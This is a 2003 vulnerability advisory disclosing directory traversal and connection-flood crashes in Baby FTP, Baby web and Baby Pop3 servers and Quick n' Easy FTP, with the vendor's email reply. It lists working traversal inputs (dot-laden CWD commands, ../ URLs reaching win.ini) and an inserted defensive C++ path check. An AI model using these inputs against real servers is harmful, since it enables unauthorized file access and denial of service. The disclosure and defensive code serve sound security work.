
baby.txt

Posted May 29, 2003
Authored by Dr. Insane

Baby FTP server version 1.2 allows for a directory traversal attack that lets a remote attacker view any file on the system by using non-standard characters with CWD. The server will also crash if multiple connections from the same host occur.

tags | exploit, remote
SHA-256 | f2693ad95d364c41a545acb6d6743c838069082815811187534c4de54b7b073d

This advisory covers some vulnerabilities I found yesterday in Baby FTP server, Baby web server, Baby Pop3
server and Quick n' easy FTP.



I informed the company about these vulnerabilities and here are the e-mails they sent me:
-----------------------------------------------------------------
From pablovandermeer@kabelfoon.nl Wed May 28 21:42:08 2003
Return-Path: <pablovandermeer@kabelfoon.nl>
Received: from cardassian.kabelfoon.nl (cardassian.kabelfoon.nl [62.45.45.18]) by localhost.localdomain (8.12.8/8.12.8) with ESMTP id h4SIg6KH025510 for <dr_insane@pathfinder.gr>; Wed, 28 May 2003 21:42:07 +0300
Received: from PABLO (kf-nawij-tg01-0881.dial.kabelfoon.nl [62.45.131.114]) by cardassian.kabelfoon.nl (Postfix) with SMTP id EFAF8BE9F0 for <dr_insane@pathfinder.gr>; Wed, 28 May 2003 20:39:21 +0200 (CEST)
Message-ID: <000f01c32548$73cf3be0$0100a8c0@PABLO>
From: "Pablo" <pablovandermeer@kabelfoon.nl>
To: xxxxxx xxxxxxx <dr_insane@pathfinder.gr>
References: <200305281812.h4SICUvC016027@localhost.localdomain>
Subject: Re: Multiple Vulnerabilities Found :)
Date: Wed, 28 May 2003 20:39:20 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-7"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To: "Pablo" <pablovandermeer@kabelfoon.nl>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

Hi,

Thank you very much for your report.
First let me say that BabyFtp server, Baby web server, Baby Pop3 server are
NOT real products but just (MFC) sample applications!
They contain even more bugs than you can think of...
As for Quick 'n Easy FTP server: can you make more connections than
configured in 'Max connections' settings?
If so how did you manage to do that?

Regards,
Pablo


Ok, thanks!
It looks like this is related to the size of physical memory, when new
sockets are created in virtual memory it will crash the application... :(
I will take a look at it first thing tomorrow morning.

Regards and keep on hacking...
Pablo




------------------------------------------
Baby FTP 1.2 Multiple Vulnerabilities.
-------------------------------------------

Release Date:
MAY 28, 2003

Systems Affected:
Baby FTP server version 1.2


Description:
While I was testing Baby FTP server last night I found some vulnerabilities. Let's take a look at the following:

1) The FTP server is vulnerable to a directory traversal attack. A remote user can see the whole hard disk
by supplying some strange CWD commands.

2) There is also a DoS attack. If you try to establish multiple connections from the same host to Baby FTP server, it will crash.


Let's Dance (Exploit)
--------------------
(1)
You need to supply these CWD commands for a successful attack:

CWD ...
CWD /...
CWD /......
CWD \...
CWD ...\
CWD .../

(2)
Let's try to establish about 100 connections with the server from the same IP:

1 220 Welcome to Baby Ftp server
2 220 Welcome to Baby Ftp server
3 220 Welcome to Baby Ftp server
.
.
.
.
67 220 Welcome to Baby Ftp server

b00m..crash:>

The error message will be: "Unhandled exception(MFC42.DLL):0xC00000005:Access Violation"




^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Quick n' easy FTP server 1.7 DOS ATTACK
---------------------------------------


Systems Affected:
Quick n' easy FTP server 1.7

Description:
------------
There is one D0s attack (yes again!) in Quick n' easy FTP server 1.7. By making a big number of connections you can crash the
server:>

Exploit:
--------
The same as above... try to establish a big number of connections using the same IP and the server will crash.


BABY web server 1.5 Multiple bugs
---------------------------------------

Systems Affected:
Baby web server 1.5


Description:
------------
While I was checking Baby web server version 1.5 I found some stupid bugs. The first is a directory traversal bug and the second
a DoS attack. Let's find out what is going on!

Exploit:
--------
(1) You can read whatever you want on the remote server by supplying some /.././ in your web browser:

https://[server]/../../../../windows/win.ini
https://[server]\..\..\..\windows/win.ini

etc..etc..etc...

(2)

By supplying again a very big number of connections the web server will crash:) It seems that all the products of
www.pablovandermeer.nl have the same problem.
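
A server-side check that refuses every CWD argument listed for Baby FTP and both URL forms listed for Baby web server, shown as an added example (not code from this advisory or from the Baby servers). The function name resolve_virtual_path and the /pub working directory are assumptions; the check treats / and \ alike, refuses to climb above the virtual root, and rejects any component ending in a dot or space because Windows path normalization can rewrite such names.

```cpp
// Added example, not Baby FTP/Web server code: confine a client-supplied path
// to the virtual root before it is joined to the real root directory.
#include <cstdio>
#include <string>
#include <vector>

// Hypothetical helper: true and a canonical "/a/b" in `out` only if `request`
// (resolved against `cwd`) stays inside the virtual root "/".
bool resolve_virtual_path(const std::string& cwd, const std::string& request,
                          std::string& out) {
    std::vector<std::string> stack;
    auto feed = [&stack](const std::string& path) -> bool {
        std::string part;
        for (std::size_t i = 0; i <= path.size(); ++i) {
            char c = (i < path.size()) ? path[i] : '/';   // sentinel flushes last part
            if (c != '/' && c != '\\') {                  // both separators count
                if (c == ':' || static_cast<unsigned char>(c) < 0x20)
                    return false;                         // drive/stream syntax, control bytes
                part += c;
                continue;
            }
            if (part == "..") {
                if (stack.empty()) return false;          // would climb above the root
                stack.pop_back();
            } else if (!part.empty() && part != ".") {
                if (part.back() == '.' || part.back() == ' ')
                    return false;                         // "...", "dir.": Win32 may rewrite these
                stack.push_back(part);
            }
            part.clear();
        }
        return true;
    };
    bool absolute = !request.empty() && (request[0] == '/' || request[0] == '\\');
    if (!absolute && !feed(cwd)) return false;            // relative: start from cwd
    if (!feed(request)) return false;
    out = "/";
    for (std::size_t i = 0; i < stack.size(); ++i)
        out += (i ? "/" : "") + stack[i];
    return true;
}

int main() {  // the advisory's inputs, then one legitimate request
    const char* reqs[] = {"...", "/...", "/......", "\\...", "...\\", ".../",
                          "/../../../../windows/win.ini", "docs/../readme.txt"};
    std::string out;
    for (const char* r : reqs)
        std::printf("%-30s %s\n", r, resolve_virtual_path("/pub", r, out) ? out.c_str() : "REJECTED");
}
```

The returned path contains no dot components, so it can be appended to the configured root directory; a web server should call it on the request path after percent-decoding it exactly once.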


BABY Pop3 server Version 1.0 DOS attack
---------------------------------------
Systems Affected:
BABY Pop3 server version 1.0

Description:
------------
There is the same DoS vulnerability here :P You can crash the server by making multiple connections from the same host.






-----------------------------------------------
vulnerabilities found and tested by dr_insane
-----------------------------------------------


Feedback
---------

Please send suggestions and Comments to:

dr_insane@hack.gr
https://members.lycos.co.uk/r34ct/





